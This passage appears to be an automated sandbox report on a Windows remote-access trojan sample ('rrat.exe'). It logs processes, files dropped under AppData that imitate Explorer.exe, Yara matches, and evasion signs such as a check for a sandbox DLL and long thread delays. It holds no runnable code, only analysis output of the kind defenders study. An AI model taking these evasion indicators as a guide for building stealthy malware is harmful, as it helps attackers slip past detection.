                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\explore.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match; File source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
                        Source: Yara match; File source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
                        Source: Yara match; File source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
                        Source: Yara match; File source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
                        Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
                        Source: Yara match; File source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED
                        Source: a.exe, 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, rrat.exe, 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, rrat.exe, 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Explorer.exe.5.dr, explore.exe.16.dr, rrat.exe.4.dr; Binary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe; Memory allocated: 2350000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe; Memory allocated: 2570000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe; Memory allocated: 2350000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Memory allocated: 28D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Memory allocated: 2AE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Memory allocated: 28D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Memory allocated: 1860000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Memory allocated: 3460000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Memory allocated: 1860000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\explore.exe; Memory allocated: 1520000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\explore.exe; Memory allocated: 30E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\explore.exe; Memory allocated: 2FE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599890
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599775
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599671
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599562
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599453
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599343
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599234
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599121
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 599015
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 598906
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 598797
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 598687
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 598578
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 598465
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 598282
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597965
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597858
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597747
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597638
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597531
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597421
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597284
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597156
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 597010
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596905
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe; Thread delayed: delay time: 596796
